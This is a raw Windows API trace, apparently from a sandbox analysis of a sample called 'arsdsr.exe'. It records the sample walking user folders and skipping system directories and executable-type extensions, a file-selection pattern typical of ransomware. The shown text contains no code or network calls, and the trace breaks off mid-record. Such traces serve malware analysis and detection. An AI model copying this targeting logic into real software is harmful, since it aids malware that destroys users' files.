lstrcmpiW (lpString1="Documents", lpString2="program files") returned -1 [0151.815] lstrcmpiW (lpString1="Documents", lpString2="program files (x86)") returned -1 [0151.815] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.816] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Documents" | out: lpString1="C:/Users\\Default\\Documents") returned="C:/Users\\Default\\Documents" [0151.816] lstrcatW (in: lpString1="C:/Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:/Users\\Default\\Documents\\") returned="C:/Users\\Default\\Documents\\" [0151.816] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Documents\\" | out: lpString1="C:/Users\\Default\\Documents\\") returned="C:/Users\\Default\\Documents\\" [0151.816] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Documents\\*.*") returned="C:/Users\\Default\\Documents\\*.*" [0151.816] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Documents\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0151.818] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.818] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0151.818] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.818] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.818] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x2a0028, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0151.818] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0151.819] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Documents\\" | out: lpString1="C:/Users\\Default\\Documents\\") returned="C:/Users\\Default\\Documents\\" [0151.819] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Documents\\desktop.ini") returned="C:/Users\\Default\\Documents\\desktop.ini" [0151.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.819] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0151.819] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0151.819] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0151.819] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0151.819] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0151.819] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0151.819] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0151.819] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0151.819] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="...") returned 1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="$recycle.bin") returned 1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="rsa") returned -1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="ntuser.dat") returned -1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="programdata") returned -1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="appdata") returned 1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="program files") returned -1 [0151.819] lstrcmpiW (lpString1="My Music", lpString2="program files (x86)") returned -1 [0151.819] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Documents\\" | out: lpString1="C:/Users\\Default\\Documents\\") returned="C:/Users\\Default\\Documents\\" [0151.819] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\", lpString2="My Music" | out: lpString1="C:/Users\\Default\\Documents\\My Music") returned="C:/Users\\Default\\Documents\\My Music" [0151.819] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\My Music", lpString2="\\" | out: lpString1="C:/Users\\Default\\Documents\\My Music\\") returned="C:/Users\\Default\\Documents\\My Music\\" [0151.819] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Default\\Documents\\My Music\\" | out: lpString1="C:/Users\\Default\\Documents\\My Music\\") returned="C:/Users\\Default\\Documents\\My Music\\" [0151.819] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Documents\\My Music\\*.*") returned="C:/Users\\Default\\Documents\\My Music\\*.*" [0151.819] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x75401ca2, ftCreationTime.dwLowDateTime=0x295e2ac, ftCreationTime.dwHighDateTime=0x208, ftLastAccessTime.dwLowDateTime=0x53fa18, ftLastAccessTime.dwHighDateTime=0x508d58, ftLastWriteTime.dwLowDateTime=0x70, ftLastWriteTime.dwHighDateTime=0x295e2d4, nFileSizeHigh=0x61ba8a7e, nFileSizeLow=0x1e, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="￾￿\x02", cAlternateFileName="")) returned 0xffffffff [0151.821] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="...") returned 1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="$recycle.bin") returned 1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="rsa") returned -1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="ntuser.dat") returned -1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="programdata") returned -1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="appdata") returned 1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="program files") returned -1 [0151.821] lstrcmpiW (lpString1="My Pictures", lpString2="program files (x86)") returned -1 [0151.821] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Documents\\" | out: lpString1="C:/Users\\Default\\Documents\\") returned="C:/Users\\Default\\Documents\\" [0151.821] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\", lpString2="My Pictures" | out: lpString1="C:/Users\\Default\\Documents\\My Pictures") returned="C:/Users\\Default\\Documents\\My Pictures" [0151.822] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:/Users\\Default\\Documents\\My Pictures\\") returned="C:/Users\\Default\\Documents\\My Pictures\\" [0151.822] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Default\\Documents\\My Pictures\\" | out: lpString1="C:/Users\\Default\\Documents\\My Pictures\\") returned="C:/Users\\Default\\Documents\\My Pictures\\" [0151.822] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Documents\\My Pictures\\*.*") returned="C:/Users\\Default\\Documents\\My Pictures\\*.*" [0151.822] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x75401ca2, ftCreationTime.dwLowDateTime=0x295e2ac, ftCreationTime.dwHighDateTime=0x208, ftLastAccessTime.dwLowDateTime=0x53fa18, ftLastAccessTime.dwHighDateTime=0x508d58, ftLastWriteTime.dwLowDateTime=0x70, ftLastWriteTime.dwHighDateTime=0x295e2d4, nFileSizeHigh=0x61ba8a7e, nFileSizeLow=0x1e, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="￾￿\x02", cAlternateFileName="")) returned 0xffffffff [0151.822] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="...") returned 1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="$recycle.bin") returned 1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="rsa") returned -1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="ntuser.dat") returned -1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="programdata") returned -1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="appdata") returned 1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="program files") returned -1 [0151.822] lstrcmpiW (lpString1="My Videos", lpString2="program files (x86)") returned -1 [0151.822] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Documents\\" | out: lpString1="C:/Users\\Default\\Documents\\") returned="C:/Users\\Default\\Documents\\" [0151.822] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\", lpString2="My Videos" | out: lpString1="C:/Users\\Default\\Documents\\My Videos") returned="C:/Users\\Default\\Documents\\My Videos" [0151.822] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:/Users\\Default\\Documents\\My Videos\\") returned="C:/Users\\Default\\Documents\\My Videos\\" [0151.822] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Default\\Documents\\My Videos\\" | out: lpString1="C:/Users\\Default\\Documents\\My Videos\\") returned="C:/Users\\Default\\Documents\\My Videos\\" [0151.822] lstrcatW (in: lpString1="C:/Users\\Default\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Documents\\My Videos\\*.*") returned="C:/Users\\Default\\Documents\\My Videos\\*.*" [0151.822] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x75401ca2, ftCreationTime.dwLowDateTime=0x295e2ac, ftCreationTime.dwHighDateTime=0x208, ftLastAccessTime.dwLowDateTime=0x53fa18, ftLastAccessTime.dwHighDateTime=0x508d58, ftLastWriteTime.dwLowDateTime=0x70, ftLastWriteTime.dwHighDateTime=0x295e2d4, nFileSizeHigh=0x61ba8a7e, nFileSizeLow=0x1e, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="￾￿\x02", cAlternateFileName="")) returned 0xffffffff [0151.822] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0151.822] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0151.823] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="...") returned 1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="$recycle.bin") returned 1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="rsa") returned -1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="ntuser.dat") returned -1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="programdata") returned -1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="appdata") returned 1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="program files") returned -1 [0151.823] lstrcmpiW (lpString1="Downloads", lpString2="program files (x86)") returned -1 [0151.823] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.823] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Downloads" | out: lpString1="C:/Users\\Default\\Downloads") returned="C:/Users\\Default\\Downloads" [0151.823] lstrcatW (in: lpString1="C:/Users\\Default\\Downloads", lpString2="\\" | out: lpString1="C:/Users\\Default\\Downloads\\") returned="C:/Users\\Default\\Downloads\\" [0151.823] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Downloads\\" | out: lpString1="C:/Users\\Default\\Downloads\\") returned="C:/Users\\Default\\Downloads\\" [0151.823] lstrcatW (in: lpString1="C:/Users\\Default\\Downloads\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Downloads\\*.*") returned="C:/Users\\Default\\Downloads\\*.*" [0151.824] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Downloads\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0151.824] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.824] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0151.824] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.824] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.824] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0151.824] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0151.824] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Downloads\\" | out: lpString1="C:/Users\\Default\\Downloads\\") returned="C:/Users\\Default\\Downloads\\" [0151.824] lstrcatW (in: lpString1="C:/Users\\Default\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Downloads\\desktop.ini") returned="C:/Users\\Default\\Downloads\\desktop.ini" [0151.824] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.824] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.824] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0151.824] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0151.824] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0151.824] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0151.824] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0151.824] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0151.824] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0151.825] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0151.825] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0151.825] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0151.825] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="...") returned 1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="$recycle.bin") returned 1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="rsa") returned -1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="ntuser.dat") returned -1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="programdata") returned -1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="appdata") returned 1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="program files") returned -1 [0151.825] lstrcmpiW (lpString1="Favorites", lpString2="program files (x86)") returned -1 [0151.825] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0151.825] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Favorites" | out: lpString1="C:/Users\\Default\\Favorites") returned="C:/Users\\Default\\Favorites" [0151.825] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:/Users\\Default\\Favorites\\") returned="C:/Users\\Default\\Favorites\\" [0151.825] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Favorites\\" | out: lpString1="C:/Users\\Default\\Favorites\\") returned="C:/Users\\Default\\Favorites\\" [0151.825] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Favorites\\*.*") returned="C:/Users\\Default\\Favorites\\*.*" [0151.825] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Favorites\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0151.828] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.828] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0151.828] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.828] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.828] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0151.828] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0151.828] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Favorites\\" | out: lpString1="C:/Users\\Default\\Favorites\\") returned="C:/Users\\Default\\Favorites\\" [0151.828] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Favorites\\desktop.ini") returned="C:/Users\\Default\\Favorites\\desktop.ini" [0151.828] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.829] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.829] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0151.829] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0151.829] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0151.829] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0151.829] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0151.829] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0151.829] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0151.829] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0151.829] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, 